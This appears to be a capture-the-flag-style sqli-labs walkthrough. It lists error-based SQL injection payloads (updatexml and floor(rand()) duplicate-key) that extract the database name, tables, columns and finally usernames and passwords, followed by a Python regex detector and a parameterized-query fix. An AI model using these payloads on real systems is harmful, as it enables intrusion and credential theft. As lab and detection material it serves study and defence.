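0. Initial page
1. Determine the closing character
The injection point is the password field, and the closing character is a single quote.
2. Extract the database name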
1' and updatexml(1,concat(0x7e,database(),0x7e),1)#
1' and (select 1 from (select count(*),concat((select database()),floor(rand()*2))x from information_schema.tables group by x) as y) #
3. Extract the table names
1' and (select 1 from (select count(*),concat((select group_concat(table_name) from information_schema.tables where table_schema='security'),floor(rand()*2))x from information_schema.tables group by x) as y) #
4. Extract the column names
1' and (select 1 from (select count(*),concat((select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users'),floor(rand()*2))x from information_schema.tables group by x) as y) #
5. Query the final result
1' and (select 1 from (select count(*),concat((select group_concat(username,0x3a,password) from users),floor(rand()*2))x from information_schema.tables group by x) as y) #
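Seen from the detection side, the payloads in steps 2 to 5 share a few stable signatures: a quote followed by a boolean operator, an XPath-error function (updatexml) or the count(*)/floor(rand())/group by duplicate-key pattern, references to information_schema, and a trailing comment. The Python below is an added example, not part of the original walkthrough or of sqli-labs, that flags form fields matching at least two of these signatures; the field names uname and passwd and the sample request bodies are constructed assumptions.

```python
import re
from urllib.parse import parse_qsl

# Signatures of the error-based techniques used in steps 2 to 5.
RULES = {
    "quote_break": re.compile(r"'\s*(and|or)\b"),
    "xpath_error": re.compile(r"\b(updatexml|extractvalue)\s*\("),
    "dup_key_error": re.compile(
        r"count\(\s*\*\s*\).*floor\(\s*rand\(.*group\s+by", re.S),
    "schema_enum": re.compile(r"\binformation_schema\s*\.\s*(tables|columns)\b"),
    "trailing_comment": re.compile(r"(#|--)\s*$"),
}

def normalise(value):
    """Lowercase, drop inline /* */ comments, collapse whitespace."""
    text = re.sub(r"/\*.*?\*/", " ", value.lower(), flags=re.S)
    return re.sub(r"\s+", " ", text).strip()

def match_rules(value):
    """Return the sorted names of all rules that match one field value."""
    text = normalise(value)
    return sorted(name for name, rx in RULES.items() if rx.search(text))

def scan_body(body):
    """Return {field: [rule names]} for form fields with two or more hits.

    A single hit is ignored because quotes and '#' occur in real passwords.
    """
    findings = {}
    for field, value in parse_qsl(body):  # parse_qsl URL-decodes the values
        hits = match_rules(value)
        if len(hits) >= 2:
            findings[field] = hits
    return findings

# Constructed sample POST bodies (field names uname/passwd are assumptions).
SAMPLES = [
    "uname=admin&passwd=O%27Brien%232024&submit=Submit",
    "uname=admin&passwd=1%27+and+updatexml%281%2Cconcat%280x7e%2C"
    "database%28%29%2C0x7e%29%2C1%29%23&submit=Submit",
]

if __name__ == "__main__":
    for body in SAMPLES:
        print(scan_body(body) or "clean")
```

Signature matching of this kind belongs in logging and alerting; the fix for the injection itself is a parameterized query for the password update, with database error text kept out of the response.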